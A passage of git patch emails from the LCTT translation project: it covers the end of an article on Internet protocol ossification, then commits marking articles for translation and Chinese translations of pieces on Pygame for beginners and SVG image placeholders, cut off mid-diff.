‘freeze’ its extensibility points, we say it has  _ossified_ . TCP itself is a severe example of ossification; so many middleboxes do so many things to TCP — whether it’s blocking packets with TCP options that aren’t recognized, or ‘optimizing’ congestion control. + +It’s necessary to prevent ossification, to ensure that protocols can evolve to meet the needs of the Internet in the future; otherwise, it would be a ‘tragedy of the commons’ where the actions of some individual networks — although well-intended — would affect the health of the Internet overall. + +There are many ways to prevent ossification; if the data in question is encrypted, it cannot be accessed by any party but those that hold the keys, preventing interference. If an extension point is unencrypted but commonly used in a way that would break applications visibly (for example, HTTP headers), it’s less likely to be interfered with. + +Where protocol designers can’t use encryption and an extension point isn’t used often, artificially exercising the extension point can help; we call this  _greasing_  it. + +For example, QUIC encourages endpoints to use a range of decoy values in its [version negotiation][32], to avoid implementations assuming that it will never change (as was often encountered in TLS implementations, leading to significant problems). + +#### The network and the user + +Beyond the desire to avoid ossification, these changes also reflect the evolving relationship between networks and their users. While for a long time people assumed that networks were always benevolent — or at least disinterested — parties, this is no longer the case, thanks not only to [pervasive monitoring][33] but also attacks like [Firesheep][34]. + +As a result, there is growing tension between the needs of Internet users overall and those of the networks who want to have access to some amount of the data flowing over them. Particularly affected will be networks that want to impose policy upon those users; for example, enterprise networks. + +In some cases, they might be able to meet their goals by installing software (or a CA certificate, or a browser extension) on their users’ machines. However, this isn’t as easy in cases where the network doesn’t own or have access to the computer; for example, BYOD has become common, and IoT devices seldom have the appropriate control interfaces. + +As a result, a lot of discussion surrounding protocol development in the IETF is touching on the sometimes competing needs of enterprises and other ‘leaf’ networks and the good of the Internet overall. + +#### Get involved + +For the Internet to work well in the long run, it needs to provide value to end users, avoid ossification, and allow networks to operate. The changes taking place now need to meet all three goals, but we need more input from network operators. + +If these changes affect your network — or won’t— please leave comments below, or better yet, get involved in the [IETF][35] by attending a meeting, joining a mailing list, or providing feedback on a draft. + +Thanks to Martin Thomson and Brian Trammell for their review. + + _Mark Nottingham is a member of the Internet Architecture Board and co-chairs the IETF’s HTTP and QUIC Working Groups._ + +-------------------------------------------------------------------------------- + +via: https://blog.apnic.net/2017/12/12/internet-protocols-changing/ + +作者:[ Mark Nottingham ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.apnic.net/author/mark-nottingham/ +[1]:https://blog.apnic.net/2017/11/17/ietf-100-singapore-dns-http-doh/ +[2]:https://blog.apnic.net/author/mark-nottingham/ +[3]:https://blog.apnic.net/category/tech-matters/ +[4]:https://blog.apnic.net/tag/dns/ +[5]:https://blog.apnic.net/tag/doh/ +[6]:https://blog.apnic.net/tag/guest-post/ +[7]:https://blog.apnic.net/tag/http/ +[8]:https://blog.apnic.net/tag/ietf/ +[9]:https://blog.apnic.net/tag/quic/ +[10]:https://blog.apnic.net/tag/tls/ +[11]:https://blog.apnic.net/tag/protocol/ +[12]:https://blog.apnic.net/2017/12/12/internet-protocols-changing/#comments +[13]:https://blog.apnic.net/ +[14]:https://www.smashingmagazine.com/2015/09/why-performance-matters-the-perception-of-time/ +[15]:https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/46197.pdf +[16]:https://http2.github.io/ +[17]:http://httpwg.org/specs/rfc7540.html#TLSUsage +[18]:http://httpwg.org/specs/rfc7540.html#BadCipherSuites +[19]:http://httpwg.org/specs/rfc7540.html#reuse +[20]:https://tools.ietf.org/html/draft-bishop-httpbis-http2-additional-certs +[21]:https://datatracker.ietf.org/doc/draft-ietf-tls-tls13/ +[22]:https://en.wikipedia.org/wiki/Forward_secrecy +[23]:https://quicwg.github.io/ +[24]:https://blog.apnic.net/2016/08/30/questions-answered-quic/ +[25]:https://quicwg.github.io/base-drafts/draft-ietf-quic-transport.html#short-header +[26]:https://www.mjkranch.com/docs/CODASPY17_Kranch_Reed_IdentifyingHTTPSNetflix.pdf +[27]:https://tools.ietf.org/html/draft-trammell-quic-spin +[28]:https://datatracker.ietf.org/wg/doh/about/ +[29]:https://datatracker.ietf.org/meeting/99/materials/slides-99-maprg-fingerprint-based-detection-of-dns-hijacks-using-ripe-atlas/ +[30]:https://datatracker.ietf.org/wg/dprive/about/ +[31]:https://developers.google.com/speed/public-dns/ +[32]:https://quicwg.github.io/base-drafts/draft-ietf-quic-transport.html#rfc.section.3.7 +[33]:https://tools.ietf.org/html/rfc7258 +[34]:http://codebutler.com/firesheep +[35]:https://www.ietf.org/ From 9f29ef9842d48b312756a855f652518c1a3910dc Mon Sep 17 00:00:00 2001 From: qhwdw Date: Wed, 13 Dec 2017 18:48:52 +0800 Subject: [PATCH 0531/1627] Translating by qhwdw --- ...ELOAD to cheat inject features and investigate programs.md | 3 +++ sources/tech/20171212 Internet protocols are changing.md | 4 +++- 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md b/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md index 2329fadd41..91029f33da 100644 --- a/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md +++ b/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md @@ -1,3 +1,4 @@ +Translating by qhwdw # Dynamic linker tricks: Using LD_PRELOAD to cheat, inject features and investigate programs **This post assumes some basic C skills.** @@ -209,3 +210,5 @@ via: https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-l [a]:https://rafalcieslak.wordpress.com/ [1]:http://www.zlibc.linux.lu/index.html + + diff --git a/sources/tech/20171212 Internet protocols are changing.md b/sources/tech/20171212 Internet protocols are changing.md index c95e8c732c..47550d3ca4 100644 --- a/sources/tech/20171212 Internet protocols are changing.md +++ b/sources/tech/20171212 Internet protocols are changing.md @@ -1,4 +1,4 @@ -Internet protocols are changing +Translating by qhwdw Internet protocols are changing ============================================================ @@ -174,3 +174,5 @@ via: https://blog.apnic.net/2017/12/12/internet-protocols-changing/ [33]:https://tools.ietf.org/html/rfc7258 [34]:http://codebutler.com/firesheep [35]:https://www.ietf.org/ + + From b5189f98aaaed13ddc6ff09b486a212172d2d777 Mon Sep 17 00:00:00 2001 From: runningwater Date: Wed, 13 Dec 2017 21:11:52 +0800 Subject: [PATCH 0532/1627] =?UTF-8?q?=E6=9A=82=E5=AD=98=E5=82=A8?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... a great pair for beginning programmers.md | 59 +++++++++---------- 1 file changed, 28 insertions(+), 31 deletions(-) diff --git a/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md b/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md index 9afdfbb2b1..9c7e916834 100644 --- a/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md +++ b/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md @@ -1,42 +1,39 @@ -(translating by runningwater) -Why Python and Pygame are a great pair for beginning programmers +为什么说 Python 和 Pygame 最适合初学者 ============================================================ -### We look at three reasons Pygame is a good choice for learning to program. +### 我们有三个理由来说明 Pygame 对初学编程者是最好的选择。 ![What's the best game platform for beginning programmers?](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/code_development_programming.png?itok=M_QDcgz5 "What's the best game platform for beginning programmers?") -Image by :  + 图片来源: [opensource.com](https://opensource.com) -opensource.com +上个月,[Scott Nesbitt][10] 发表了一篇标题为[ Mozilla 支出 50 万美元来支持开源项目][11]的文章。其中 Phaser,一个基于 HTML/JavaScript 的游戏平台项目,获得了 50,000 美元的奖励。整整一年里,我都在使用 Phaser 平台来教我的小女儿,用来学习的话,它是最简单也是最好的 HTML 游戏开发平台。然而,对于初学者来说,使用[ Pygame ][13]也许效果更好。原因如下: -Last month, [Scott Nesbitt][10] wrote about [Mozilla awarding $500K to support open source projects][11]. Phaser, a HTML/JavaScript game platform, was [awarded $50,000][12]. I’ve been teaching Phaser to my pre-teen daughter for a year, and it's one of the best and easiest HTML game development platforms to learn. [Pygame][13], however, may be a better choice for beginners. Here's why. +### 1\. 小段代码块 -### 1\. One long block of code +Pygame,基于 Python,[在介绍计算机课程中最流行的语言][14]。Python 非常适合用一小段代码来实现我们的想法,孩子们可以从单个文件和单个代码块起开始学习,在掌握函数 (function) 或类 (class) 对象之前,就可以写出意大利面条似的代码。 很像手指画,所想即所得。 -Pygame is based on Python, the [most popular language for introductory computer courses][14]. Python is great for writing out ideas in one long block of code. Kids start off with a single file and with a single block of code. Before they can get to functions or classes, they start with code that will soon resemble spaghetti. It’s like finger-painting, as they throw thoughts onto the page. +更多 Python 资源链接 -More Python Resources +* [Python 是什么?][1] -* [What is Python?][1] +* [最热门 Python IDEs][2] -* [Top Python IDEs][2] +* [最热门 Python GUI 框架][3] -* [Top Python GUI frameworks][3] +* [最新 Python 话题][4] -* [Latest Python content][4] +* [更多开发资源][5] -* [More developer resources][5] +以这样的方式来学习,当编写的代码越来越难于管理的时候,孩子们很自然就的就会把代码分解成函数模块和类模块。在学习函数之前就学习了 Python 语言的语法,学生将掌握基本的编程知识,对了解全局作用域和局部作用域起到更好的作用。 -This approach to learning works. Kids will naturally start to break things into functions and classes as their code gets more difficult to manage. By learning the syntax of a language like Python prior to learning about functions, the student will gain basic programming knowledge before using global and local scope. +大多数 HTML 游戏在一定程度上会将结构、样式和编程逻辑分为 HTML、CSS和JavaScript,并且需要 CSS 和 HTML 的知识。从长远来看,虽然拆分更好,但对初学者来说是个障碍。一旦孩子们发现他们可以用 HTML 和 CSS 快速构建网页,很有可能就会被颜色、字体和图形的视觉刺激分散注意力。即使有仅仅只专注于 JavaScript 代码的,也需要学习基本的文档结构模型,以使 JavaScript 代码能够嵌入进去。 -Most HTML games separate the structure, style, and programming logic into HTML, CSS, and JavaScript to some degree and require knowledge of CSS and HTML. While the separation is better in the long term, it can be a barrier for beginners. Once kids realize that they can quickly build web pages with HTML and CSS, they may get distracted by the visual excitement of colors, fonts, and graphics. Even those who stay focused on JavaScript coding will still need to learn the basic document structure that the JavaScript code sits in. +### 2\. 全局变量更清晰 -### 2\. Global variables are more obvious +Python 和 JavaScript 都使用动态类型变量,这意味着变量只有在赋值才能确定其类型为一个字符串、一个整数或一个浮点数,其中 JavaScript 更容易出错。类似于类型变量,JavaScript 和 Python 都有全局变量和局部变量之分。Python 中,如果在函数块内要使用全局变量,就会以 `global` 关键字区分出来。 -Both Python and JavaScript use dynamically typed variables, meaning that a variable becomes a string, an integer, or float when it’s assigned; however, making mistakes is easier in JavaScript. Similar to typed variables, both JavaScript and Python have global and local variable scopes. In Python, global variables inside of a function are identified with the global keyword. - -Let’s look at the basic [Making your first Phaser game tutorial][15], by Alvin Ourrad and Richard Davey, to understand the challenge of using Phaser to teach programming to beginners. In JavaScript, global variables—variables that can be accessed anywhere in the program—are difficult to keep track of and often are the source of bugs that are challenging to solve. Richard and Alvin are expert programmers and use global variables intentionally to keep things concise. +要理解在 Phaser 上教授编程初学者所面临的挑战的话,让我们以基本的[制作您的第一个 Phaser 游戏教程][15]为例子,它是由 Alvin Ourrad 和 Richard Davey 开发制作的。在 JavaScript 中,程序中任何地方都可以访问的全局变量很难追踪调试,常常引起 Bug 且很难解决。因为 Richard 和 Alvin 是专业程序员,所以在这儿特意使用全局变量以使程序简洁。 ``` var game = new Phaser.Game(800, 600, Phaser.AUTO, '', { preload: preload, create: create, update: update }); @@ -55,31 +52,31 @@ function create() { … ``` -In their Phaser programming book  [_Interphase_ ,][16] Richard Davey and Ilija Melentijevic explain that global variables are commonly used in many Phaser projects because they make it easier to get things done quickly. +在他们的 Phaser 编程手册 [《Interphase》][16] 中,Richard Davey 和 Ilija Melentijevic 解释说:在很多 Phaser 项目中通常都会使用全局变量,原因是使用它们完成任务更容易、更快捷。 -> “If you’ve ever worked on a game of any significant size then this approach is probably already making you cringe slightly... So why do we do it? The reason is simply because it’s the most concise and least complicated way to demonstrate what Phaser can do.” +> “如果您开发过游戏,只要代码量到一定规模,那么(使用全局变量)这种做法会使您陷入困境的,可是我们为什么还要这样做?原因很简单,仅仅只是要使我们的 Phaser 项目容易完成,更简单而已。” -Although structuring a Phaser application to use local variables and split things up nicely into separation of concerns is possible, that’s tough for kids to understand when they’re first learning to program. +针对一个 Phaser 应用程序,虽然可以使用局部变量和拆分代码块来达到关注点隔离这些手段来重构代码,但要使第一次学习编程的小孩能理解,显然很有难度的。 -If you’re set on teaching your kids to code with JavaScript, or if they already know how to code in another language like Python, a good Phaser course is [The Complete Mobile Game Development Course][17], by [Pablo Farias Navarro][18]. Although the title focuses on mobile games, the actual course focuses on JavaScript and Phaser. The JavaScript and Phaser apps are moved to a mobile phone with [PhoneGap][19]. +如果您想教你的孩子学习 JavaScript,或者如果他们已经知道怎样使用像 Python 来编程的话,有个好的 Phaser 课程推荐: [完整的手机游戏开发课程] [17],是由 [ Pablo Farias Navarro ] [18] 开发制作的。虽然标题看着是移动游戏,但实际是关于 JavaScript 和 Phaser 的。JavaScript 和 Phaser 移动应用开发已经转移到 [PhoneGap][19] 话题去了。 -### 3\. Pygame comes with less assembly required +### 3\. Pygame 无依赖要求 -Thanks to [Python Wheels][20], Pygame is now super [easy to install][21]. You can also install it on Fedora/Red Hat with the **yum** package manager: +由于 [Python Wheels][20] 的出现,Pygame 超级[容易安装][21]。在 Fedora/Red Hat 系统下也可使用 **yum** 包管理器来安装: ``` sudo yum install python3-pygame ``` -See the official [Pygame installation documentation][22] for more information. +更多消息请参考官网[Pygame 安装说明文档][22]。 -Although Phaser itself is even easier to install, it does require more knowledge to use. As mentioned previously, the student will need to assemble their JavaScript code within an HTML document with some CSS. In addition to the three languages—HTML, CSS, and JavaScript—Phaser also requires the use of Firefox or Chrome development tools and an editor. The most common editors for JavaScript are Sublime, Atom, VS Code (probably in that order). +相比来说,虽然 Phaser 本身更容易安装,但需要掌握更多的知识。前面提到的,学生需要在 HTML 文档中组装他们的 JavaScript 代码,同时还需要些 CSS。除了这三种语言(HTML、CSS、JavaScript),还需要使用火狐或谷歌开发工具和编辑器。JavaScript 最常用的编辑器有 Sublime、Atom、VS Code(按使用多少排序)等。 -Phaser applications will not run if you open the HTML file in a browser directly, due to [same-origin policy][23]. You must run a web server and access the files by connecting to the web server. Fortunately, you don’t need to run Apache on your local computer; you can run something lightweight like [httpster][24] for most projects. +由于[浏览器同源策略][23]的原因,如果您直接在浏览器中打开 HTML 文件的话,Phaser 应用是不会运行的。您必须运行 Web 服务,并通过服务访问这些文件。还好,对于大多数工程项目,可以不用在本地运行 Apache 服务,只需要运行一些轻量级的服务就可以,比如 [httpster][24]。 -### Advantages of Phaser and JavaScript +### Phaser 和 JavaScript 的优势 -With all the challenges of JavaScript and Phaser, why am I teaching them? Honestly, I held off for a long time. I worried about students learning variable hoisting and scope. I developed my own curriculum based on Pygame and Python, then I developed one based on Phaser. Eventually, I decided to use Pablo’s pre-made curriculum as a starting point.  +JavaScript 和 Phaser 有着种种的不好,为什么我还继续教授他们?老实说,我考虑了很长一段时间,我在担心着学生学习变量申明提升和变量作用域的揪心。所有我开发出基于 Pygame 和 Python 的课程,随后也开发出一涛基于 Phaser 的。最终,我决定使用 Pablo 预先制定的课程作为起点。 There are really two reasons that I moved to JavaScript. First, JavaScript has emerged as a serious language used in serious applications. In addition to web applications, it’s used for mobile and server applications. JavaScript is everywhere, and it’s used widely in applications kids see every day. If their friends code in JavaScript, they'll likely want to as well. As I saw the momentum behind JavaScript, I looked into alternatives that could compile into JavaScript, primarily Dart and TypeScript. I didn’t mind the extra conversion step, but I still looked at JavaScript. From 682de2e2bb54393aebe71c167be84d2742eb12c8 Mon Sep 17 00:00:00 2001 From: nodekey Date: Wed, 13 Dec 2017 21:36:21 +0800 Subject: [PATCH 0533/1627] KeyLD translating --- .../tech/20171019 3 Simple Excellent Linux Network Monitors.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171019 3 Simple Excellent Linux Network Monitors.md b/sources/tech/20171019 3 Simple Excellent Linux Network Monitors.md index 28b784e763..7dcf21a7a7 100644 --- a/sources/tech/20171019 3 Simple Excellent Linux Network Monitors.md +++ b/sources/tech/20171019 3 Simple Excellent Linux Network Monitors.md @@ -1,5 +1,6 @@ 3 Simple, Excellent Linux Network Monitors ============================================================ +KeyLD translating ![network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner_3.png?itok=iuPcSN4k "network") Learn more about your network connections with the iftop, Nethogs, and vnstat tools.[Used with permission][3] From a2298223604638ed11ad11a34d79e841f524012e Mon Sep 17 00:00:00 2001 From: liuyakun Date: Wed, 13 Dec 2017 23:37:21 +0800 Subject: [PATCH 0534/1627] =?UTF-8?q?=E3=80=90=E7=BF=BB=E8=AF=91=E4=B8=AD?= =?UTF-8?q?=E3=80=91by=20liuxinyu123?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171213 Creating a blog with pelican and Github pages.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171213 Creating a blog with pelican and Github pages.md b/sources/tech/20171213 Creating a blog with pelican and Github pages.md index ef3bf36a9b..f252ae343d 100644 --- a/sources/tech/20171213 Creating a blog with pelican and Github pages.md +++ b/sources/tech/20171213 Creating a blog with pelican and Github pages.md @@ -1,3 +1,5 @@ +translating by liuxinyu123 + Creating a blog with pelican and Github pages ====== From e4c2d439acd2fc0991555735d419445c8f2089b3 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 13 Dec 2017 23:37:07 +0800 Subject: [PATCH 0535/1627] PRF:20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @qhwdw 很好的文章。 --- ...lder and Other Image Loading Techniques.md | 145 ++++++++---------- 1 file changed, 62 insertions(+), 83 deletions(-) diff --git a/translated/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md b/translated/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md index 32c24db6dc..df86d3580e 100644 --- a/translated/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md +++ b/translated/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md @@ -1,135 +1,123 @@ -怎么去使用 SVG 作为一个占位符,以及其它图像加载技术 +怎么使用 SVG 作为一个图像占位符 ============================================================ ![](https://cdn-images-1.medium.com/max/1563/0*zJGl1vKLttcJGIL4.jpg) -从被用作占位符的图像中生成 SVGs。继续阅读! + +*从图像中生成的 SVG 可以用作占位符。请继续阅读!* -我对怎么去让 web 性能更优化和图像加载的更快充满了热情。对这些感兴趣的领域中的其中一项研究就是占位符:当图像还没有被加载的时候应该去展示些什么? +我对怎么去让 web 性能更优化和图像加载的更快充满了热情。在这些感兴趣的领域中的其中一项研究就是占位符:当图像还没有被加载的时候应该去展示些什么? -在前此天,我偶然发现了使用 SVG 的一些加载技术,随后,我将在这篇文章中去描述它。 +在前些天,我偶然发现了使用 SVG 的一些加载技术,我将在这篇文章中谈论它。 在这篇文章中我们将涉及如下的主题: * 不同的占位符类型的概述 - -* 基于 SVG 的占位符(边缘、形状、和轮廓) - +* 基于 SVG 的占位符(边缘、形状和轮廓) * 自动化处理 ### 不同的占位符类型的概述 -以前 [我写的关于占位符和图像延迟加载(lazy-loading)][28] 的文章和 [关于它的讨论][29] 中。当进行一个图像的延迟加载时,一个很好的主意是去考虑提供一个东西作为占位符,因为,它可能会很大程序上影响用户的感知体验。以前我提供了几个选项: - +之前 [我写过一篇关于图像占位符和延迟加载lazy-loading][28] 的文章以及 [关于它的讨论][29]。当进行一个图像的延迟加载时,一个很好的办法是提供一个东西作为占位符,因为它可能会很大程度上影响用户的感知体验。之前我提供了几个选择: ![](https://cdn-images-1.medium.com/max/1563/0*jlMM144vAhH-0bEn.png) -在图像被加载之前,有几种办法去填充图像区域。 +在图像被加载之前,有几种办法去填充图像区域: -* 在图像区保持空白:在一个响应式设计的环境中,这种方式防止了内容的跳跃。这种布局从用户体验的角度来看是非常差的作法。但是,它是为了性能的考虑,否则,每次为了获取图像尺寸,浏览器被迫进行布局重计算,以为它留下空间。 +* 在图像区域保持空白:在一个响应式设计的环境中,这种方式防止了内容的跳跃。从用户体验的角度来看,那些布局的改变是非常差的作法。但是,它是为了性能的考虑,否则,每次为了获取图像尺寸,浏览器就要被迫进行布局重新计算,以便为它留下空间。 +* 占位符:在图像那里显示一个用户配置的图像。我们可以在背景上显示一个轮廓。它一直显示直到实际的图像被加载完成,它也被用于当请求失败或者当用户根本没有设置头像图像的情况下。这些图像一般都是矢量图,并且由于尺寸非常小,可以作为内联图片。 +* 单一颜色:从图像中获取颜色,并将其作为占位符的背景颜色。这可能是图像的主要颜色、最具活力的颜色 … 这个想法是基于你正在加载的图像,并且它将有助于在没有图像和图像加载完成之间进行平滑过渡。 +* 模糊的图像:也被称为模糊技术。你提供一个极小版本的图像,然后再去过渡到完整的图像。最初显示的图像的像素和尺寸是极小的。为去除细节artifacts,该图像会被放大并模糊化。我在前面写的 [Medium 是怎么做的渐进加载图像][1]、[使用 WebP 去创建极小的预览图像][2]、和[渐进加载图像的更多示例][3] 中讨论过这方面的内容。 -* 占位符:在那里显示一个用户配置的图像。我们可以在背景上显示一个轮廓。它一直显示直到实际的图像被加载,它也被用于当请求失败或者当用户根本没有设置图像的情况下。这些图像一般都是矢量图,并且都选择尺寸非常小的内联图片。 - -* 固定的颜色:从图像中获取颜色,并将其作为占位符的背景颜色。这可能是主导的颜色,最具活力的 … 这个主意是基于你正在加载的图像,并且它将有助于在没有图像和图像加载完成之间进行平滑过渡。 - -* 模糊的图像:也被称为模糊技术。你提供一个极小版本的图像,然后再去过渡到完整的图像。最初的图像的像素和尺寸是极小的。为去除伪影图像(artifacts the image)被放大和模糊化。我在前面写的 [怎么去做中间的渐进加载的图像][1]、[使用 WebP 去创建极小的预览图像][2]、和 [渐进加载图像的更多示例][3] 中讨论过这方面的内容。 - -结果是,还有其它的更多的变化,并且许多聪明的人开发了其它的创建占位符的技术。 - -其中一个就是用梯度图代替固定的颜色。梯度图可以创建一个更精确的最终图像的预览,它整体上非常小(提升了有效载荷)。 +此外还有其它的更多的变种,许多聪明的人也开发了其它的创建占位符的技术。 +其中一个就是用梯度图代替单一的颜色。梯度图可以创建一个更精确的最终图像的预览,它整体上非常小(提升了有效载荷)。 ![](https://cdn-images-1.medium.com/max/1250/0*ecPkBAl69ayvRctn.jpg) -使用梯度图作为背景。来自 Gradify 的截屏,它现在并不在线,代码 [在 GitHub][4]。 + +*使用梯度图作为背景。这是来自 Gradify 的截屏,它现在已经不在线了,代码 [在 GitHub][4]。* -其它的技术是使用基于 SVGs 的技术,它在最近的实验和黑客中得到了一些支持。 +另外一种技术是使用基于 SVG 的技术,它在最近的实验和研究中取得到了一些进展。 ### 基于 SVG 的占位符 -我们知道 SVGs 是完美的矢量图像。在大多数情况下我们是希望去加载一个位图,所以,问题是怎么去矢量化一个图像。一些选择是使用边缘、形状和轮廓。 +我们知道 SVG 是完美的矢量图像。而在大多数情况下我们是希望加载一个位图,所以,问题是怎么去矢量化一个图像。其中一些方法是使用边缘、形状和轮廓。 #### 边缘 -在 [前面的文章中][30],我解释了怎么去找出一个图像的边缘和创建一个动画。我最初的目标是去尝试绘制区域,矢量化这个图像,但是,我并不知道该怎么去做到。我意识到使用边缘也可能被创新,并且,我决定去让它们动起来,创建一个 “绘制” 的效果。 +在 [前面的文章中][30],我解释了怎么去找出一个图像的边缘并创建一个动画。我最初的目标是去尝试绘制区域,矢量化该图像,但是我并不知道该怎么去做到。我意识到使用边缘也可能是一种创新,我决定去让它们动起来,创建一个 “绘制” 的效果。 + +- [范例](https://codepen.io/jmperez/embed/oogqdp?default-tabs=html%2Cresult&embed-version=2&height=600&host=https%3A%2F%2Fcodepen.io&referrer=https%3A%2F%2Fmedium.freecodecamp.org%2Fmedia%2F8c5c44a4adf82b09692a34eb4daa3e2e%3FpostId%3Dbed1b810ab2c&slug-hash=oogqdp#result-box) -[在以前,使用边缘检测绘制图像和 SVG 动画,在 SVG 中基本上不被使用和支持的。一段时间以后,我们开始用它去作为一个有趣的替代 … medium.com][31][][32] +> [使用边缘检测绘制图像和 SVG 动画][31] + +> 在以前,很少使用和支持 SVG。一段时间以后,我们开始用它去作为一个某些图标的传统位图的替代品…… #### 形状 -SVG 也可以用于去从图像中绘制区域而不是边缘/边界。用这种方法,我们可以矢量化一个位图去创建一个占位符。 +SVG 也可以用于根据图像绘制区域而不是边缘/边界。用这种方法,我们可以矢量化一个位图来创建一个占位符。 -在以前,我尝试去用三角形做类似的事情。你可以在我的 [at CSSConf][33] 和 [Render Conf][34] 的演讲中看到它。 +在以前,我尝试去用三角形做类似的事情。你可以在 [CSSConf][33] 和 [Render Conf][34] 上我的演讲中看到它。 + +- [范例](https://codepen.io/jmperez/embed/BmaWmQ?default-tabs=html%2Cresult&embed-version=2&height=600&host=https%3A%2F%2Fcodepen.io&referrer=https%3A%2F%2Fmedium.freecodecamp.org%2Fmedia%2F05d1ee44f0537f8257258124d7b94613%3FpostId%3Dbed1b810ab2c&slug-hash=BmaWmQ#result-box) - -上面的 codepen 是一个由 245 个三角形组成的基于 SVG 占位符的观点的证明。生成的三角形是使用 [Possan’s polyserver][36] 基于 [Delaunay triangulation][35]。正如预期的那样,使用更多的三角形,文件尺寸就更大。 +上面的 codepen 是一个由 245 个三角形组成的基于 SVG 占位符的概念验证。生成的三角形是基于 [Delaunay triangulation][35] 的,使用了 [Possan’s polyserver][36]。正如预期的那样,使用更多的三角形,文件尺寸就更大。 #### Primitive 和 SQIP,一个基于 SVG 的 LQIP 技术 -Tobias Baldauf 正在致力于另一个使用 SVGs 的被称为 [SQIP][37] 的低质量图像占位符技术。在深入研究 SQIP 之前,我先简单了解一下 [Primitive][38],它是基于 SQIP 的一个库。 +Tobias Baldauf 正在致力于另一个使用 SVG 的低质量图像占位符技术,它被称为 [SQIP][37]。在深入研究 SQIP 之前,我先简单介绍一下 [Primitive][38],它是基于 SQIP 的一个库。 -Primitive 是非常吸引人的,我强烈建议你去了解一下。它讲解了一个位图怎么变成由重叠形状组成的 SVG。它尺寸比较小,一个更小的往返,更适合直接放置到页面中,在一个初始的 HTML 载荷中,它是非常有意义的。 +Primitive 是非常吸引人的,我强烈建议你去了解一下。它讲解了一个位图怎么变成由重叠形状组成的 SVG。它尺寸比较小,适合于直接内联放置到页面中。当步骤较少时,在初始的 HTML 载荷中作为占位符是非常有意义的。 -Primitive 基于像三角形、长方形、和圆形等形状去生成一个图像。在每一步中它增加一个新形状。很多步之后,图像的结果看起来非常接近原始图像。如果你输出的是 SVG,它意味着输出代码的尺寸将很大。 - -为了理解 Primitive 是怎么工作的,我通过几个图像来跑一下它。我用 10 个形状和 100 个形状来为这个插画生成 SVGs: - - ** 此处有Canvas,请手动处理 ** - -![](https://cdn-images-1.medium.com/max/625/1*y4sr9twkh_WyZh6h0yH98Q.png) +Primitive 基于三角形、长方形、和圆形等形状生成一个图像。在每一步中它增加一个新形状。很多步之后,图像的结果看起来非常接近原始图像。如果你输出的是 SVG,它意味着输出代码的尺寸将很大。 +为了理解 Primitive 是怎么工作的,我通过几个图像来跑一下它。我用 10 个形状和 100 个形状来为这个插画生成 SVG: +![](https://cdn-images-1.medium.com/max/625/1*y4sr9twkh_WyZh6h0yH98Q.png) ![](https://cdn-images-1.medium.com/max/625/1*cqyhYnx83LYvhGdmg2dFDw.png) - ![](https://cdn-images-1.medium.com/max/625/1*qQP5160gPKQdysh0gFnNfw.jpeg) -Processing [this picture][5] 使用 Primitive,使用 [10 个形状][6] 和 [100 形状][7]。 - + +使用 Primitive 处理 ,使用 [10 个形状][6] 、 [100 形状][7]、 [原图][5]。 ![](https://cdn-images-1.medium.com/max/625/1*PWZLlC4lrLO4CVv1GwR7qA.png) - - - ![](https://cdn-images-1.medium.com/max/625/1*khnga22ldJKOZ2z45Srh8A.png) - - ![](https://cdn-images-1.medium.com/max/625/1*N-20rR7YGFXiDSqIeIyOjA.jpeg) -Processing [this picture][8] 使用 Primitive,使用 [10 形状][9] 和 [100 形状][10]。 + +使用 Primitive 处理,使用 [10 形状][9] 、 [100 形状][10]、 [原图][8] 。 -当在图像中使用 10 个形状时,我们基本构画出了原始图像。在图像环境占位符这里我们使用了 SVG 作为潜在的占位符。实际上,使用 10 个形状的 SVG 代码已经很小了,大约是 1030 字节,当通过 SVGO 传输时,它将下降到 ~640 字节。 +当在图像中使用 10 个形状时,我们基本构画出了原始图像。在图像占位符这种使用场景里,我们可以使用这种 SVG 作为潜在的占位符。实际上,使用 10 个形状的 SVG 代码已经很小了,大约是 1030 字节,当通过 SVGO 传输时,它将下降到约 640 字节。 ``` ``` -使用 100 个形状生成的图像是很大的,正如我们预期的那样,在 SVGO(之前是 8kB)之后,加权大小为 ~5kB。它们在细节上已经很好了,但是仍然是个很小的载荷。使用多少三角形主要取决于图像类型和细腻程序(如,对比度、颜色数量、复杂度)。 +正如我们预计的那样,使用 100 个形状生成的图像更大,在 SVGO(之前是 8kB)之后,大小约为 5kB。它们在细节上已经很好了,但是仍然是个很小的载荷。使用多少三角形主要取决于图像类型和细腻程度(如,对比度、颜色数量、复杂度)。 -它还可能去创建一个类似于 [cpeg-dssim][39] 的脚本,去调整所使用的形状的数量,以满足 [结构相似][40] 的阈值(或者最差情况中的最大数量)。 +还可以创建一个类似于 [cpeg-dssim][39] 的脚本,去调整所使用的形状的数量,以满足 [结构相似][40] 的阈值(或者最差情况中的最大数量)。 -这些 SVG 